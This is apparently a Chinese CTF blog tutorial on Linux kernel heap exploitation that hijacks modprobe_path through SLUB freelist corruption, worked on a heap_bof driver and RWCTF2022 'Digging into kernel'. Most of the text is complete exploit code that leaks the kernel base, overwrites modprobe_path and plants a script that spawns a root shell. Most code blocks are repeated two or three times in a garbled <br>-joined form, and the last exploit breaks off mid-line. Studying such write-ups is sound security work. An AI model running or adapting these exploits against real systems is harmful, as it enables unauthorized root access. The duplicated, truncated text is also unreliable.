前言
本文我们通过我们的老朋友heap_bof来讲解Linux kernel中任意地址申请的其中一种比赛比较常用的利用手法modprobe_path(虽然在高版本内核已经不可用了但ctf比赛还是比较常用的)。再通过两道近期比赛的赛题来讲解。
Arbitrary Address Allocation
利用思路
通过 uaf 修改 object 的 free list 指针实现任意地址分配。与 glibc 不同的是,内核的 slub 堆管理器缺少检查,因此对要分配的目标地址要求不高,不过有一点需要注意:当我们分配到目标地址时会把目标地址前 8 字节的数据会被写入 freelist,而这通常并非一个有效的地址,从而导致 kernel panic,因此在任意地址分配时最好确保目标 object 的 free list 字段为 NULL 。
当能够任意地址分配的时候,与 glibc 改 hook 类似,在内核中通常修改的是 modprobe_path 。modprobe_path 是内核中的一个变量,其值为 /sbin/modprobe ,因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。
当我们尝试去执行(execve)一个非法的文件(file magic not found),内核会经历如下调用链:
entry_SYSCALL_64()<br> sys_execve()<br> do_execve()<br> do_execveat_common()<br> bprm_execve()<br> exec_binprm()<br> search_binary_handler()<br> __request_module() // wrapped as request_module<br> call_modprobe()entry_SYSCALL_64()<br> sys_execve()<br> do_execve()<br> do_execveat_common()<br> bprm_execve()<br> exec_binprm()<br> search_binary_handler()<br> __request_module() // wrapped as request_module<br> call_modprobe()entry_SYSCALL_64()
sys_execve()
do_execve()
do_execveat_common()
bprm_execve()
exec_binprm()
search_binary_handler()
__request_module() // wrapped as request_module
call_modprobe()
其中 call_modprobe() 定义于 kernel/kmod.c,我们主要关注这部分代码:
static int call_modprobe(char *module_name, int wait)<br>{<br> //...<br> argv[0] = modprobe_path;<br> argv[1] = "-q";<br> argv[2] = "--";<br> argv[3] = module_name; /* check free_modprobe_argv() */<br> argv[4] = NULL;<br><br> info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,<br> NULL, free_modprobe_argv, NULL);<br> if (!info)<br> goto free_module_name;<br><br> return call_usermodehelper_exec(info, wait | UMH_KILLABLE);<br> //...static int call_modprobe(char *module_name, int wait)<br>{<br> //...<br> argv[0] = modprobe_path;<br> argv[1] = "-q";<br> argv[2] = "--";<br> argv[3] = module_name; /* check free_modprobe_argv() */<br> argv[4] = NULL;<br><br> info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,<br> NULL, free_modprobe_argv, NULL);<br> if (!info)<br> goto free_module_name;<br><br> return call_usermodehelper_exec(info, wait | UMH_KILLABLE);<br> //...static int call_modprobe(char *module_name, int wait)
{
//...
argv[0] = modprobe_path;
argv[1] = "-q";
argv[2] = "--";
argv[3] = module_name; /* check free_modprobe_argv() */
argv[4] = NULL;
info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
NULL, free_modprobe_argv, NULL);
if (!info)
goto free_module_name;
return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
//...
在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。 我们不难想到的是:若是我们能够劫持 modprobe_path,将其改写为我们指定的恶意脚本的路径,随后我们再执行一个非法文件,内核将会以 root 权限执行我们的恶意脚本。
或者分析vmlinux即可(对于一些没有call_modprobe()符号的直接交叉引用即可)。
__int64 _request_module(<br> char a1,<br> __int64 a2,<br> double a3,<br> double a4,<br> double a5,<br> double a6,<br> double a7,<br> double a8,<br> double a9,<br> double a10,<br> ...)<br>{<br>......<br> if ( v19 )<br> {<br>......<br> v21 = call_usermodehelper_setup(<br> (__int64)&byte_FFFFFFFF82444700, // modprobe_path<br> (__int64)v18,<br> (__int64)&off_FFFFFFFF82444620,<br> 3264,<br> 0LL,<br> (__int64)free_modprobe_argv,<br> 0LL);<br>......<br>}<br>.data:FFFFFFFF82444700 byte_FFFFFFFF82444700 ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r<br>.data:FFFFFFFF82444700 db 2Fh ; / ; __request_module+14B↑o ... <br>.data:FFFFFFFF82444701 db 73h ; s<br>.data:FFFFFFFF82444702 db 62h ; b<br>.data:FFFFFFFF82444703 db 69h ; i<br>.data:FFFFFFFF82444704 db 6Eh ; n<br>.data:FFFFFFFF82444705 db 2Fh ; /<br>.data:FFFFFFFF82444706 db 6Dh ; m<br>.data:FFFFFFFF82444707 db 6Fh ; o<br>.data:FFFFFFFF82444708 db 64h ; d<br>.data:FFFFFFFF82444709 db 70h ; p<br>.data:FFFFFFFF8244470A db 72h ; r<br>.data:FFFFFFFF8244470B db 6Fh ; o<br>.data:FFFFFFFF8244470C db 62h ; b<br>.data:FFFFFFFF8244470D db 65h ; e<br>.data:FFFFFFFF8244470E db 0__int64 _request_module(<br> char a1,<br> __int64 a2,<br> double a3,<br> double a4,<br> double a5,<br> double a6,<br> double a7,<br> double a8,<br> double a9,<br> double a10,<br> ...)<br>{<br>......<br> if ( v19 )<br> {<br>......<br> v21 = call_usermodehelper_setup(<br> (__int64)&byte_FFFFFFFF82444700, // modprobe_path<br> (__int64)v18,<br> (__int64)&off_FFFFFFFF82444620,<br> 3264,<br> 0LL,<br> (__int64)free_modprobe_argv,<br> 0LL);<br>......<br>}<br>.data:FFFFFFFF82444700 byte_FFFFFFFF82444700 ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r<br>.data:FFFFFFFF82444700 db 2Fh ; / ; __request_module+14B↑o ... <br>.data:FFFFFFFF82444701 db 73h ; s<br>.data:FFFFFFFF82444702 db 62h ; b<br>.data:FFFFFFFF82444703 db 69h ; i<br>.data:FFFFFFFF82444704 db 6Eh ; n<br>.data:FFFFFFFF82444705 db 2Fh ; /<br>.data:FFFFFFFF82444706 db 6Dh ; m<br>.data:FFFFFFFF82444707 db 6Fh ; o<br>.data:FFFFFFFF82444708 db 64h ; d<br>.data:FFFFFFFF82444709 db 70h ; p<br>.data:FFFFFFFF8244470A db 72h ; r<br>.data:FFFFFFFF8244470B db 6Fh ; o<br>.data:FFFFFFFF8244470C db 62h ; b<br>.data:FFFFFFFF8244470D db 65h ; e<br>.data:FFFFFFFF8244470E db 0__int64 _request_module(
char a1,
__int64 a2,
double a3,
double a4,
double a5,
double a6,
double a7,
double a8,
double a9,
double a10,
...)
{
......
if ( v19 )
{
......
v21 = call_usermodehelper_setup(
(__int64)&byte_FFFFFFFF82444700, // modprobe_path
(__int64)v18,
(__int64)&off_FFFFFFFF82444620,
3264,
0LL,
(__int64)free_modprobe_argv,
0LL);
......
}
.data:FFFFFFFF82444700 byte_FFFFFFFF82444700 ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r
.data:FFFFFFFF82444700 db 2Fh ; / ; __request_module+14B↑o ...
.data:FFFFFFFF82444701 db 73h ; s
.data:FFFFFFFF82444702 db 62h ; b
.data:FFFFFFFF82444703 db 69h ; i
.data:FFFFFFFF82444704 db 6Eh ; n
.data:FFFFFFFF82444705 db 2Fh ; /
.data:FFFFFFFF82444706 db 6Dh ; m
.data:FFFFFFFF82444707 db 6Fh ; o
.data:FFFFFFFF82444708 db 64h ; d
.data:FFFFFFFF82444709 db 70h ; p
.data:FFFFFFFF8244470A db 72h ; r
.data:FFFFFFFF8244470B db 6Fh ; o
.data:FFFFFFFF8244470C db 62h ; b
.data:FFFFFFFF8244470D db 65h ; e
.data:FFFFFFFF8244470E db 0
exp
#include "src/pwn_helper.h"<br><br>#define BOF_MALLOC 5<br>#define BOF_FREE 7<br>#define BOF_WRITE 8<br>#define BOF_READ 9<br><br>size_t modprobe_path = 0xFFFFFFFF81E48140;<br>size_t seq_ops_start = 0xffffffff81228d90;<br><br>struct param {<br> size_t len;<br> size_t *buf;<br> long long idx;<br>};<br><br>void alloc_buf(int fd, struct param* p)<br>{<br> printf("[+] kmalloc len:%lu idx:%lld\n", p->len, p->idx);<br> ioctl(fd, BOF_MALLOC, p);<br>}<br><br>void free_buf(int fd, struct param* p)<br>{<br> printf("[+] kfree len:%lu idx:%lld\n", p->len, p->idx);<br> ioctl(fd, BOF_FREE, p);<br>}<br><br>void read_buf(int fd, struct param* p)<br>{<br> printf("[+] copy_to_user len:%lu idx:%lld\n", p->len, p->idx);<br> ioctl(fd, BOF_READ, p);<br>}<br><br>void write_buf(int fd, struct param* p)<br>{<br> printf("[+] copy_from_user len:%lu idx:%lld\n", p->len, p->idx);<br> ioctl(fd, BOF_WRITE, p);<br>}<br><br>int main()<br>{<br> // len buf idx<br> size_t* buf = malloc(0x500);<br> struct param p = {0x20, buf, 0};<br><br> printf("[+] user_buf : %p\n", p.buf);<br> int bof_fd = open("/dev/bof", O_RDWR);<br> if (bof_fd < 0) {<br> puts(RED "[-] Failed to open bof." NONE);<br> exit(-1);<br> }<br><br> printf(YELLOW "[*] try to leak kbase\n" NONE);<br><br> alloc_buf(bof_fd, &p);<br> free_buf(bof_fd, &p);<br><br> int seq_fd = open("/proc/self/stat", O_RDONLY);<br> read_buf(bof_fd, &p);<br> qword_dump("leak seq_ops", buf, 0x20);<br><br> size_t kernel_offset = buf[0] - seq_ops_start;<br> printf(YELLOW "[*] kernel_offset %p\n" NONE, (void*)kernel_offset);<br> modprobe_path += kernel_offset;<br> printf(LIGHT_BLUE "[*] modprobe_path addr : %p\n" NONE, (void*)modprobe_path);<br> <br> p.len = 0xa8;<br> alloc_buf(bof_fd, &p);<br> free_buf(bof_fd, &p);<br><br> read_buf(bof_fd, &p);<br><br> buf[0] = modprobe_path - 0x20;<br><br> write_buf(bof_fd, &p);<br><br> alloc_buf(bof_fd, &p);<br> alloc_buf(bof_fd, &p);<br><br> read_buf(bof_fd, &p);<br> qword_dump("leak modprobe_path", buf, 0x30);<br><br> strcpy((char *) &buf[4], "/tmp/shell.sh\x00");<br> write_buf(bof_fd, &p);<br> read_buf(bof_fd, &p);<br> qword_dump("leak modprobe_path", buf, 0x30);<br><br> if (open("/shell.sh", O_RDWR) < 0) {<br> system("echo '#!/bin/sh' >> /tmp/shell.sh");<br> system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh");<br> system("chmod +x /tmp/shell.sh");<br> }<br><br> system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");<br> system("chmod +x /tmp/fake");<br> system("/tmp/fake");<br><br> return 0;<br>}#include "src/pwn_helper.h"<br><br>#define BOF_MALLOC 5<br>#define BOF_FREE 7<br>#define BOF_WRITE 8<br>#define BOF_READ 9<br><br>size_t modprobe_path = 0xFFFFFFFF81E48140;<br>size_t seq_ops_start = 0xffffffff81228d90;<br><br>struct param {<br> size_t len;<br> size_t *buf;<br> long long idx;<br>};<br><br>void alloc_buf(int fd, struct param* p)<br>{<br> printf("[+] kmalloc len:%lu idx:%lld\n", p->len, p->idx);<br> ioctl(fd, BOF_MALLOC, p);<br>}<br><br>void free_buf(int fd, struct param* p)<br>{<br> printf("[+] kfree len:%lu idx:%lld\n", p->len, p->idx);<br> ioctl(fd, BOF_FREE, p);<br>}<br><br>void read_buf(int fd, struct param* p)<br>{<br> printf("[+] copy_to_user len:%lu idx:%lld\n", p->len, p->idx);<br> ioctl(fd, BOF_READ, p);<br>}<br><br>void write_buf(int fd, struct param* p)<br>{<br> printf("[+] copy_from_user len:%lu idx:%lld\n", p->len, p->idx);<br> ioctl(fd, BOF_WRITE, p);<br>}<br><br>int main()<br>{<br> // len buf idx<br> size_t* buf = malloc(0x500);<br> struct param p = {0x20, buf, 0};<br><br> printf("[+] user_buf : %p\n", p.buf);<br> int bof_fd = open("/dev/bof", O_RDWR);<br> if (bof_fd < 0) {<br> puts(RED "[-] Failed to open bof." NONE);<br> exit(-1);<br> }<br><br> printf(YELLOW "[*] try to leak kbase\n" NONE);<br><br> alloc_buf(bof_fd, &p);<br> free_buf(bof_fd, &p);<br><br> int seq_fd = open("/proc/self/stat", O_RDONLY);<br> read_buf(bof_fd, &p);<br> qword_dump("leak seq_ops", buf, 0x20);<br><br> size_t kernel_offset = buf[0] - seq_ops_start;<br> printf(YELLOW "[*] kernel_offset %p\n" NONE, (void*)kernel_offset);<br> modprobe_path += kernel_offset;<br> printf(LIGHT_BLUE "[*] modprobe_path addr : %p\n" NONE, (void*)modprobe_path);<br> <br> p.len = 0xa8;<br> alloc_buf(bof_fd, &p);<br> free_buf(bof_fd, &p);<br><br> read_buf(bof_fd, &p);<br><br> buf[0] = modprobe_path - 0x20;<br><br> write_buf(bof_fd, &p);<br><br> alloc_buf(bof_fd, &p);<br> alloc_buf(bof_fd, &p);<br><br> read_buf(bof_fd, &p);<br> qword_dump("leak modprobe_path", buf, 0x30);<br><br> strcpy((char *) &buf[4], "/tmp/shell.sh\x00");<br> write_buf(bof_fd, &p);<br> read_buf(bof_fd, &p);<br> qword_dump("leak modprobe_path", buf, 0x30);<br><br> if (open("/shell.sh", O_RDWR) < 0) {<br> system("echo '#!/bin/sh' >> /tmp/shell.sh");<br> system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh");<br> system("chmod +x /tmp/shell.sh");<br> }<br><br> system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");<br> system("chmod +x /tmp/fake");<br> system("/tmp/fake");<br><br> return 0;<br>}#include "src/pwn_helper.h"
#define BOF_MALLOC 5
#define BOF_FREE 7
#define BOF_WRITE 8
#define BOF_READ 9
size_t modprobe_path = 0xFFFFFFFF81E48140;
size_t seq_ops_start = 0xffffffff81228d90;
struct param {
size_t len;
size_t *buf;
long long idx;
};
void alloc_buf(int fd, struct param* p)
{
printf("[+] kmalloc len:%lu idx:%lld\n", p->len, p->idx);
ioctl(fd, BOF_MALLOC, p);
}
void free_buf(int fd, struct param* p)
{
printf("[+] kfree len:%lu idx:%lld\n", p->len, p->idx);
ioctl(fd, BOF_FREE, p);
}
void read_buf(int fd, struct param* p)
{
printf("[+] copy_to_user len:%lu idx:%lld\n", p->len, p->idx);
ioctl(fd, BOF_READ, p);
}
void write_buf(int fd, struct param* p)
{
printf("[+] copy_from_user len:%lu idx:%lld\n", p->len, p->idx);
ioctl(fd, BOF_WRITE, p);
}
int main()
{
// len buf idx
size_t* buf = malloc(0x500);
struct param p = {0x20, buf, 0};
printf("[+] user_buf : %p\n", p.buf);
int bof_fd = open("/dev/bof", O_RDWR);
if (bof_fd < 0) {
puts(RED "[-] Failed to open bof." NONE);
exit(-1);
}
printf(YELLOW "[*] try to leak kbase\n" NONE);
alloc_buf(bof_fd, &p);
free_buf(bof_fd, &p);
int seq_fd = open("/proc/self/stat", O_RDONLY);
read_buf(bof_fd, &p);
qword_dump("leak seq_ops", buf, 0x20);
size_t kernel_offset = buf[0] - seq_ops_start;
printf(YELLOW "[*] kernel_offset %p\n" NONE, (void*)kernel_offset);
modprobe_path += kernel_offset;
printf(LIGHT_BLUE "[*] modprobe_path addr : %p\n" NONE, (void*)modprobe_path);
p.len = 0xa8;
alloc_buf(bof_fd, &p);
free_buf(bof_fd, &p);
read_buf(bof_fd, &p);
buf[0] = modprobe_path - 0x20;
write_buf(bof_fd, &p);
alloc_buf(bof_fd, &p);
alloc_buf(bof_fd, &p);
read_buf(bof_fd, &p);
qword_dump("leak modprobe_path", buf, 0x30);
strcpy((char *) &buf[4], "/tmp/shell.sh\x00");
write_buf(bof_fd, &p);
read_buf(bof_fd, &p);
qword_dump("leak modprobe_path", buf, 0x30);
if (open("/shell.sh", O_RDWR) < 0) {
system("echo '#!/bin/sh' >> /tmp/shell.sh");
system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh");
system("chmod +x /tmp/shell.sh");
}
system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
system("chmod +x /tmp/fake");
system("/tmp/fake");
return 0;
}
![图片[1]-Linux kernel 堆溢出利用方法(三)-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202411261416673.png)
RWCTF2022 Digging into kernel 1 & 2
题目分析
start.sh
#!/bin/sh<br><br>qemu-system-x86_64 \<br> -kernel bzImage \<br> -initrd rootfs.img \<br> -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet noapic kalsr" \<br> -cpu kvm64,+smep,+smap \<br> -monitor null \<br> --nographic \<br> -s#!/bin/sh<br><br>qemu-system-x86_64 \<br> -kernel bzImage \<br> -initrd rootfs.img \<br> -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet noapic kalsr" \<br> -cpu kvm64,+smep,+smap \<br> -monitor null \<br> --nographic \<br> -s#!/bin/sh
qemu-system-x86_64 \
-kernel bzImage \
-initrd rootfs.img \
-append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet noapic kalsr" \
-cpu kvm64,+smep,+smap \
-monitor null \
--nographic \
-s
逆向分析
int __cdecl xkmod_init()<br>{<br> kmem_cache *v0; // rax<br><br> printk(&unk_1E4);<br> misc_register(&xkmod_device);<br> v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);<br> buf = 0LL;<br> s = v0;<br> return 0;<br>}int __cdecl xkmod_init()<br>{<br> kmem_cache *v0; // rax<br><br> printk(&unk_1E4);<br> misc_register(&xkmod_device);<br> v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);<br> buf = 0LL;<br> s = v0;<br> return 0;<br>}int __cdecl xkmod_init()
{
kmem_cache *v0; // rax
printk(&unk_1E4);
misc_register(&xkmod_device);
v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
buf = 0LL;
s = v0;
return 0;
}
int __fastcall xkmod_release(inode *inode, file *file)<br>{<br> return kmem_cache_free(s, buf); // maybe double free<br>}int __fastcall xkmod_release(inode *inode, file *file)<br>{<br> return kmem_cache_free(s, buf); // maybe double free<br>}int __fastcall xkmod_release(inode *inode, file *file)
{
return kmem_cache_free(s, buf); // maybe double free
}
void __fastcall xkmod_ioctl(__int64 a1, int a2, __int64 a3)<br>{<br> __int64 data; // [rsp+0h] [rbp-20h] BYREF<br> unsigned int idx; // [rsp+8h] [rbp-18h]<br> unsigned int size; // [rsp+Ch] [rbp-14h]<br> unsigned __int64 v6; // [rsp+10h] [rbp-10h]<br> // v3 __ : 0x8 rsp + 0x0<br> // v4 __ : 0x4 rsp + 0x8<br> // v5 __ : 0x4 rsp + 0xc<br> v6 = __readgsqword(0x28u);<br> if ( a3 )<br> {<br> copy_from_user(&data, a3, 0x10LL);<br> if ( a2 == 0x6666666 )<br> {<br> if ( buf && size <= 0x50 && idx <= 0x70 )<br> {<br> copy_from_user((char *)buf + (int)idx, data, (int)size);<br> return;<br> }<br> }<br> else<br> {<br> if ( a2 != 0x7777777 )<br> {<br> if ( a2 == 0x1111111 )<br> buf = (void *)kmem_cache_alloc(s, 0xCC0LL);<br> return;<br> }<br> if ( buf && size <= 0x50 && idx <= 0x70 )<br> {<br> ((void (__fastcall *)(__int64, char *, int))copy_to_user)(data, (char *)buf + (int)idx, size);<br> return;<br> }<br> }<br> xkmod_ioctl_cold();<br> }<br>}void __fastcall xkmod_ioctl(__int64 a1, int a2, __int64 a3)<br>{<br> __int64 data; // [rsp+0h] [rbp-20h] BYREF<br> unsigned int idx; // [rsp+8h] [rbp-18h]<br> unsigned int size; // [rsp+Ch] [rbp-14h]<br> unsigned __int64 v6; // [rsp+10h] [rbp-10h]<br> // v3 __ : 0x8 rsp + 0x0<br> // v4 __ : 0x4 rsp + 0x8<br> // v5 __ : 0x4 rsp + 0xc<br> v6 = __readgsqword(0x28u);<br> if ( a3 )<br> {<br> copy_from_user(&data, a3, 0x10LL);<br> if ( a2 == 0x6666666 )<br> {<br> if ( buf && size <= 0x50 && idx <= 0x70 )<br> {<br> copy_from_user((char *)buf + (int)idx, data, (int)size);<br> return;<br> }<br> }<br> else<br> {<br> if ( a2 != 0x7777777 )<br> {<br> if ( a2 == 0x1111111 )<br> buf = (void *)kmem_cache_alloc(s, 0xCC0LL);<br> return;<br> }<br> if ( buf && size <= 0x50 && idx <= 0x70 )<br> {<br> ((void (__fastcall *)(__int64, char *, int))copy_to_user)(data, (char *)buf + (int)idx, size);<br> return;<br> }<br> }<br> xkmod_ioctl_cold();<br> }<br>}void __fastcall xkmod_ioctl(__int64 a1, int a2, __int64 a3)
{
__int64 data; // [rsp+0h] [rbp-20h] BYREF
unsigned int idx; // [rsp+8h] [rbp-18h]
unsigned int size; // [rsp+Ch] [rbp-14h]
unsigned __int64 v6; // [rsp+10h] [rbp-10h]
// v3 __ : 0x8 rsp + 0x0
// v4 __ : 0x4 rsp + 0x8
// v5 __ : 0x4 rsp + 0xc
v6 = __readgsqword(0x28u);
if ( a3 )
{
copy_from_user(&data, a3, 0x10LL);
if ( a2 == 0x6666666 )
{
if ( buf && size <= 0x50 && idx <= 0x70 )
{
copy_from_user((char *)buf + (int)idx, data, (int)size);
return;
}
}
else
{
if ( a2 != 0x7777777 )
{
if ( a2 == 0x1111111 )
buf = (void *)kmem_cache_alloc(s, 0xCC0LL);
return;
}
if ( buf && size <= 0x50 && idx <= 0x70 )
{
((void (__fastcall *)(__int64, char *, int))copy_to_user)(data, (char *)buf + (int)idx, size);
return;
}
}
xkmod_ioctl_cold();
}
}
利用思路
关于内核基址获取,在内核堆基址(page_offset_base) + 0x9d000 处存放着 secondary_startup_64 函数的地址,而我们可以从 free object 的 next 指针获得一个堆上地址,从而去找堆的基址,之后分配到一个堆基址 + 0x9d000 处的 object 以泄露内核基址,这个地址前面刚好有一片为 NULL 的区域方便我们分配。
#define __PAGE_OFFSET page_offset_base<br>#define PAGE_OFFSET ((unsigned long)__PAGE_OFFSET)<br>#define __va(x) ((void *)((unsigned long)(x)+PAGE_OFFSET))<br><br> /* Must be perfomed *after* relocation. */<br> trampoline_header = (struct trampoline_header *)<br> __va(real_mode_header->trampoline_header);<br> ...<br> trampoline_header->start = (u64) secondary_startup_64;<br>[......]<br>// vmlinux 查找 secondary_startup_64 基址<br>.text:FFFFFFFF81000030 ; void secondary_startup_64()<br>[......]<br>pwndbg>x/40gx (0xffff9f5d40000000+0x9d000-0x20<br>0xffff9f5d4009cfe0: 0X0000000000000000 0X0000000000000000<br>0xffff9f5d4009cff0: 0X0000000000000000 0X0000000005c0c067<br>0xffff9f5d4009d000: 0xffffffff97c00030 0X0000000000000901<br>0xffff9f5d4009d010: 0X00000000000006b0 0X0000000000000000<br>0xffff9f5d4009d020: 0X0000000000000000 0X0000000000000000#define __PAGE_OFFSET page_offset_base<br>#define PAGE_OFFSET ((unsigned long)__PAGE_OFFSET)<br>#define __va(x) ((void *)((unsigned long)(x)+PAGE_OFFSET))<br><br> /* Must be perfomed *after* relocation. */<br> trampoline_header = (struct trampoline_header *)<br> __va(real_mode_header->trampoline_header);<br> ...<br> trampoline_header->start = (u64) secondary_startup_64;<br>[......]<br>// vmlinux 查找 secondary_startup_64 基址<br>.text:FFFFFFFF81000030 ; void secondary_startup_64()<br>[......]<br>pwndbg>x/40gx (0xffff9f5d40000000+0x9d000-0x20<br>0xffff9f5d4009cfe0: 0X0000000000000000 0X0000000000000000<br>0xffff9f5d4009cff0: 0X0000000000000000 0X0000000005c0c067<br>0xffff9f5d4009d000: 0xffffffff97c00030 0X0000000000000901<br>0xffff9f5d4009d010: 0X00000000000006b0 0X0000000000000000<br>0xffff9f5d4009d020: 0X0000000000000000 0X0000000000000000#define __PAGE_OFFSET page_offset_base
#define PAGE_OFFSET ((unsigned long)__PAGE_OFFSET)
#define __va(x) ((void *)((unsigned long)(x)+PAGE_OFFSET))
/* Must be perfomed *after* relocation. */
trampoline_header = (struct trampoline_header *)
__va(real_mode_header->trampoline_header);
...
trampoline_header->start = (u64) secondary_startup_64;
[......]
// vmlinux 查找 secondary_startup_64 基址
.text:FFFFFFFF81000030 ; void secondary_startup_64()
[......]
pwndbg>x/40gx (0xffff9f5d40000000+0x9d000-0x20
0xffff9f5d4009cfe0: 0X0000000000000000 0X0000000000000000
0xffff9f5d4009cff0: 0X0000000000000000 0X0000000005c0c067
0xffff9f5d4009d000: 0xffffffff97c00030 0X0000000000000901
0xffff9f5d4009d010: 0X00000000000006b0 0X0000000000000000
0xffff9f5d4009d020: 0X0000000000000000 0X0000000000000000
至于 page_offset_base 可以通过 object 上的 free list 泄露的堆地址与上 0xFFFFFFFFF0000000 获取。不同版本可查看vmmap。
exp
#ifndef _GNU_SOURCE<br>#define _GNU_SOURCE<br>#endif<br><br>#include <asm/ldt.h><br>#include <assert.h><br>#include <ctype.h><br>#include <errno.h><br>#include <fcntl.h><br>#include <linux/keyctl.h><br>#include <linux/userfaultfd.h><br>#include <poll.h><br>#include <pthread.h><br>#include <sched.h><br>#include <semaphore.h><br>#include <signal.h><br>#include <stdbool.h><br>#include <stdint.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <string.h><br>#include <sys/ioctl.h><br>#include <sys/ipc.h><br>#include <sys/mman.h><br>#include <sys/msg.h><br>#include <sys/prctl.h><br>#include <sys/sem.h><br>#include <sys/shm.h><br>#include <sys/socket.h><br>#include <sys/syscall.h><br>#include <sys/types.h><br>#include <sys/wait.h><br>#include <sys/xattr.h><br>#include <unistd.h><br>#include <sys/io.h><br><br>size_t modprobe_path = 0xFFFFFFFF82444700;<br><br>void qword_dump(char *desc, void *addr, int len)<br>{<br> uint64_t *buf64 = (uint64_t *) addr;<br> uint8_t *buf8 = (uint8_t *) addr;<br> if (desc != NULL) {<br> printf("[*] %s:\n", desc);<br> }<br> for (int i = 0; i < len / 8; i += 4) {<br> printf(" %04x", i * 8);<br> for (int j = 0; j < 4; j++) {<br> i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");<br> }<br> printf(" ");<br> for (int j = 0; j < 32 && j + i * 8 < len; j++) {<br> printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');<br> }<br> puts("");<br> }<br>}<br><br>struct Data {<br> size_t *buf;<br> u_int32_t offset;<br> u_int32_t size;<br>};<br><br>void alloc_buf(int fd, struct Data *data)<br>{<br> ioctl(fd, 0x1111111, data);<br>}<br><br>void write_buf(int fd, struct Data *data)<br>{<br> ioctl(fd, 0x6666666, data);<br>}<br><br>void read_buf(int fd, struct Data *data)<br>{<br> ioctl(fd, 0x7777777, data);<br>}<br><br>int main()<br>{<br> int xkmod_fd[5];<br> for (int i = 0; i < 5; i++) {<br> xkmod_fd[i] = open("/dev/xkmod", O_RDONLY);<br> if (xkmod_fd[i] < 0) {<br> printf("[-] %d Failed to open xkmod.", i);<br> exit(-1);<br> }<br> }<br><br> struct Data data = {malloc(0x1000), 0, 0x50};<br> alloc_buf(xkmod_fd[0], &data);<br> close(xkmod_fd[0]);<br><br> read_buf(xkmod_fd[1], &data);<br> qword_dump("buf", data.buf, 0x50);<br><br> size_t page_offset_base = data.buf[0] & 0xFFFFFFFFF0000000;<br> printf("[+] page_offset_base: %p\n", page_offset_base);<br><br> data.buf[0] = page_offset_base + 0x9d000 - 0x10;<br> write_buf(xkmod_fd[1], &data);<br> alloc_buf(xkmod_fd[1], &data);<br> alloc_buf(xkmod_fd[1], &data);<br><br> data.size = 0x50;<br> read_buf(xkmod_fd[1], &data);<br> qword_dump("buf", data.buf, 0x50);<br> <br> size_t kernel_offset = data.buf[2] - 0xffffffff81000030;<br> printf("kernel offset: %p\n", kernel_offset);<br> modprobe_path += kernel_offset;<br><br> close(xkmod_fd[1]);<br> data.buf[0] = modprobe_path - 0x10;<br> write_buf(xkmod_fd[2], &data);<br> alloc_buf(xkmod_fd[2], &data);<br> alloc_buf(xkmod_fd[2], &data);<br> strcpy((char *) &data.buf[2], "/home/shell.sh");<br> write_buf(xkmod_fd[2], &data);<br><br> if (open("/home/shell.sh", O_RDWR) < 0) {<br> system("echo '#!/bin/sh' >> /home/shell.sh");<br> system("echo 'setsid cttyhack setuidgid 0 sh' >> /home/shell.sh");<br> system("chmod +x /home/shell.sh");<br> }<br><br> system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");<br> system("chmod +x /home/fake");<br> system("/home/fake");<br><br> return 0;<br>}#ifndef _GNU_SOURCE<br>#define _GNU_SOURCE<br>#endif<br><br>#include <asm/ldt.h><br>#include <assert.h><br>#include <ctype.h><br>#include <errno.h><br>#include <fcntl.h><br>#include <linux/keyctl.h><br>#include <linux/userfaultfd.h><br>#include <poll.h><br>#include <pthread.h><br>#include <sched.h><br>#include <semaphore.h><br>#include <signal.h><br>#include <stdbool.h><br>#include <stdint.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <string.h><br>#include <sys/ioctl.h><br>#include <sys/ipc.h><br>#include <sys/mman.h><br>#include <sys/msg.h><br>#include <sys/prctl.h><br>#include <sys/sem.h><br>#include <sys/shm.h><br>#include <sys/socket.h><br>#include <sys/syscall.h><br>#include <sys/types.h><br>#include <sys/wait.h><br>#include <sys/xattr.h><br>#include <unistd.h><br>#include <sys/io.h><br><br>size_t modprobe_path = 0xFFFFFFFF82444700;<br><br>void qword_dump(char *desc, void *addr, int len)<br>{<br> uint64_t *buf64 = (uint64_t *) addr;<br> uint8_t *buf8 = (uint8_t *) addr;<br> if (desc != NULL) {<br> printf("[*] %s:\n", desc);<br> }<br> for (int i = 0; i < len / 8; i += 4) {<br> printf(" %04x", i * 8);<br> for (int j = 0; j < 4; j++) {<br> i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");<br> }<br> printf(" ");<br> for (int j = 0; j < 32 && j + i * 8 < len; j++) {<br> printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');<br> }<br> puts("");<br> }<br>}<br><br>struct Data {<br> size_t *buf;<br> u_int32_t offset;<br> u_int32_t size;<br>};<br><br>void alloc_buf(int fd, struct Data *data)<br>{<br> ioctl(fd, 0x1111111, data);<br>}<br><br>void write_buf(int 